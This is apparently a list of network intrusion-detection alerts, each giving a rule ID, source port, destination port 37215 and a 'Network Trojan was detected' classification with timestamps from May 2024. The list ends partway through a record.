          SID:2829579
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111690
          SID:2829579
          Source Port:40486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842137
          SID:2835222
          Source Port:39234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487539
          SID:2829579
          Source Port:57760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803322
          SID:2829579
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145218
          SID:2835222
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692092
          SID:2835222
          Source Port:60996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977926
          SID:2835222
          Source Port:37674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190385
          SID:2829579
          Source Port:48244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985230
          SID:2835222
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090443
          SID:2829579
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741833
          SID:2829579
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215690
          SID:2835222
          Source Port:56202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223146
          SID:2835222
          Source Port:49908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.082828
          SID:2829579
          Source Port:47780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147781
          SID:2829579
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793330
          SID:2835222
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.797385
          SID:2829579
          Source Port:39738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352450
          SID:2829579
          Source Port:48920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462601
          SID:2835222
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226167
          SID:2829579
          Source Port:40708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965375
          SID:2829579
          Source Port:59986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953543
          SID:2835222
          Source Port:48118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430221
          SID:2829579
          Source Port:60266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195770
          SID:2829579
          Source Port:54386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667645
          SID:2829579
          Source Port:44610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157585
          SID:2829579
          Source Port:41946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298545
          SID:2829579
          Source Port:39120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849132
          SID:2835222
          Source Port:59234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852670
          SID:2835222
          Source Port:33218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141368
          SID:2835222
          Source Port:37024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551190
          SID:2835222
          Source Port:33150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.996370
          SID:2835222
          Source Port:55404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154330
          SID:2829579
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939368
          SID:2835222
          Source Port:39734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326552
          SID:2829579
          Source Port:39672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530134
          SID:2829579
          Source Port:42330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066631
          SID:2835222
          Source Port:35554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216364
          SID:2829579
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272755
          SID:2835222
          Source Port:33288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325335
          SID:2829579
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206941
          SID:2835222
          Source Port:51060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669258
          SID:2829579
          Source Port:58652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039597
          SID:2829579
          Source Port:36222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268007
          SID:2835222
          Source Port:36514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939429
          SID:2829579
          Source Port:59436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626916
          SID:2835222
          Source Port:51170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651366
          SID:2829579
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992448
          SID:2835222
          Source Port:38148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943224
          SID:2835222
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677659
          SID:2829579
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487955
          SID:2829579
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177995
          SID:2835222
          Source Port:46380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614674
          SID:2829579
          Source Port:60726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849117
          SID:2829579
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211155
          SID:2829579
          Source Port:46786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350504
          SID:2829579
          Source Port:34238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269759
          SID:2835222
          Source Port:42440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466226
          SID:2835222
          Source Port:43534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338667
          SID:2835222
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737402
          SID:2829579
          Source Port:44876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.297071
          SID:2829579
          Source Port:48670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178490
          SID:2835222
          Source Port:45740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656215
          SID:2835222
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039225
          SID:2835222
          Source Port:49124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.533108
          SID:2835222
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538879
          SID:2835222
          Source Port:54772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226001
          SID:2829579
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532805
          SID:2835222
          Source Port:52824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847573
          SID:2829579
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998380
          SID:2835222
          Source Port:35712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164951
          SID:2835222
          Source Port:54856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269853
          SID:2835222
          Source Port:56828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215662
          SID:2835222
          Source Port:57102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.490207
          SID:2835222
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935305
          SID:2829579
          Source Port:46022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195769
          SID:2835222
          Source Port:59704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548499
          SID:2829579
          Source Port:48092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298975
          SID:2829579
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794383
          SID:2835222
          Source Port:36190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322195
          SID:2829579
          Source Port:38896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400871
          SID:2835222
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073940
          SID:2829579
          Source Port:59734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307259
          SID:2829579
          Source Port:60690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795126
          SID:2835222
          Source Port:54560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943363
          SID:2829579
          Source Port:49010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466495
          SID:2829579
          Source Port:43818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635730
          SID:2829579
          Source Port:58790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230055
          SID:2829579
          Source Port:43828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415898
          SID:2829579
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183224
          SID:2829579
          Source Port:44098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477929
          SID:2829579
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.130723
          SID:2835222
          Source Port:49014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152134
          SID:2829579
          Source Port:42566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405235
          SID:2829579
          Source Port:44274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959640
          SID:2835222
          Source Port:59980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979255
          SID:2835222
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959939
          SID:2829579
          Source Port:53890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144720
          SID:2829579
          Source Port:60582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923640
          SID:2835222
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530283
          SID:2829579
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530373
          SID:2835222
          Source Port:53432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923053
          SID:2835222
          Source Port:50040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114203
          SID:2829579
          Source Port:49094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105742
          SID:2835222
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941488
          SID:2835222
          Source Port:53064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.313274
          SID:2829579
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336515
          SID:2829579
          Source Port:58546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.796848
          SID:2835222
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695779
          SID:2835222
          Source Port:50458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651262
          SID:2835222
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195547
          SID:2835222
          Source Port:40770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708922
          SID:2829579
          Source Port:46148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811770
          SID:2829579
          Source Port:44018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849275
          SID:2835222
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332105
          SID:2835222
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726812
          SID:2835222
          Source Port:37364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328097
          SID:2829579
          Source Port:52702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772028
          SID:2829579
          Source Port:33620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266229
          SID:2835222
          Source Port:54838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976816
          SID:2835222
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664971
          SID:2835222
          Source Port:57718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727931
          SID:2835222
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913837
          SID:2829579
          Source Port:39864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975263
          SID:2835222
          Source Port:52852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944896
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.368513
          SID:2829579
          Source Port:38732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819452
          SID:2829579
          Source Port:58980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664390
          SID:2835222
          Source Port:35812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062215
          SID:2835222
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015877
          SID:2829579
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590912
          SID:2835222
          Source Port:45092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473558
          SID:2829579
          Source Port:50300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680634
          SID:2829579
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213605
          SID:2829579
          Source Port:50514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685702
          SID:2829579
          Source Port:42888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796227
          SID:2835222
          Source Port:57384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729325
          SID:2829579
          Source Port:59970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930984
          SID:2835222
          Source Port:59902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960707
          SID:2829579
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217304
          SID:2829579
          Source Port:36828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291712
          SID:2835222
          Source Port:52484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527409
          SID:2835222
          Source Port:36072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553067
          SID:2829579
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795945
          SID:2829579
          Source Port:46306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925439
          SID:2835222
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298261
          SID:2829579
          Source Port:42958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553632
          SID:2829579
          Source Port:46134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669299
          SID:2829579
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795952
          SID:2835222
          Source Port:47682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339763
          SID:2835222
          Source Port:41340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724589
          SID:2829579
          Source Port:35878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190746
          SID:2835222
          Source Port:34702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842459
          SID:2835222
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.546980
          SID:2835222
          Source Port:53880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321182
          SID:2829579
          Source Port:60834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874767
          SID:2835222
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464229
          SID:2829579
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271681
          SID:2835222
          Source Port:59072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695866
          SID:2835222
          Source Port:51360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890303
          SID:2835222
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698193
          SID:2829579
          Source Port:59322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594623
          SID:2835222
          Source Port:38002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752361
          SID:2829579
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272666
          SID:2829579
          Source Port:53472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665476
          SID:2829579
          Source Port:52972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177147
          SID:2835222
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197344
          SID:2829579
          Source Port:41186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528008
          SID:2829579
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657042
          SID:2835222
          Source Port:46068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890809
          SID:2835222
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951905
          SID:2829579
          Source Port:38012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229894
          SID:2835222
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131725
          SID:2829579
          Source Port:34112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138365
          SID:2829579
          Source Port:43264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721792
          SID:2829579
          Source Port:40120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924013
          SID:2835222
          Source Port:56938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760556
          SID:2835222
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080686
          SID:2829579
          Source Port:41706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474873
          SID:2835222
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978973
          SID:2829579
          Source Port:54776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265753
          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710556
          SID:2829579
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.683216
          SID:2835222
          Source Port:58246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529129
          SID:2829579
          Source Port:52214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269823
          SID:2829579
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770992
          SID:2829579
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195693
          SID:2835222
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712258
          SID:2829579
          Source Port:60990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501136
          SID:2829579
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561910
          SID:2835222
          Source Port:53732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926573
          SID:2829579
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815427
          SID:2829579
          Source Port:39358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464414
          SID:2835222
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142572
          SID:2829579
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.759205
          SID:2835222
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044748
          SID:2829579
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225478
          SID:2835222
          Source Port:35458
          Destination Port:37215
